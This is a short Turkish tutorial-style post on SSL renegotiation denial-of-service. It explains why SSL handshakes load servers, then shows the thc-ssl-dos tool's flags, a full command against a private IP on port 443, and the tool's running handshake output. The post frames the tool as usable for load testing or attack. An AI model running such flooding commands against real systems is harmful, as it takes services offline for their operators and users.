SSL Servisine Yönelik DOS Saldırıları

Önemli bilgiler (örneğin e-posta adresi, kredi kartı bilgileri, TCKN, kullanıcı adı şifre gibi) iletim esnasında kriptolu olarak iletilmelidir. HTTP clear-text protokoldür ve SSL/TLS ile korunarak HTTPS olarak yapılandırılabilir. Kriptografi algoritmaları, algoritmanın gücüne göre belirli seviyede koruma sağlayabilir.

Secure Sockets Layer(SSL) protokolü, internet üzerinden güvenli veri iletişimi sağlayan bir protokoldür. Günümüzde en çok online bankacılık işlemlerinde, sosyal ağlarda, mail sunucularında tercih edilmektedir.

Herhangi bir manipülasyona maruz kalmadan kurulmuş normal bir ssl bağlantısı, standart bir http bağlantısından ortalama 10-15 kat daha fazla işlemci gücüne ihtiyaç duymaktadır. Bu durumun sonucunda ise sunucuya daha fazla iş düşeceği için daha çok kaynağa ihtiyaç duyacaktır. 
Bu durumdan yola çıkarak geliştirilen thc-ssl-dos aracı istemci ile sunucu arasında oluşturduğu trafik ile sunucunun ssl isteklerine cevap verebilme performansını ölçmektedir. Cevap veremediği durumda ise servis dışı kalacaktır ve sistem “down” gözükecektir. Aşağıdaki ekran alıntısında saldırını anatomisine ait bir görsel verilmiştir.



Ssl kullanan herhangi bir uygulamaya yük testi yapmak ya da saldırı aracı olarak kullanmak için thc-ssl-dos aracı kullanılabilir ve genel kullanımı aşağıdaki gibidir.
  • -l   :  Açılmak istenen bağlantı sayısını belirtmektedir.
  • 10.10.10.12 : Hedef IP adresi
  • 443 : SSL Portu
root@osmncht# thc-ssl-dos -l 50 10.10.10.12 443 –accept
  ______________ ___  _________
    __    ___/   |    _   ___
      |    | /    ~    /      /
      |    |    Y    /     ____
      |____|  ___|_  /  ______  /
                    /          /
           http://www.thc.org

         Twitter @hackerschoice

Greetingz: the french underground

Waiting for script kiddies to piss off…………….
The force is with those who read the source…
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err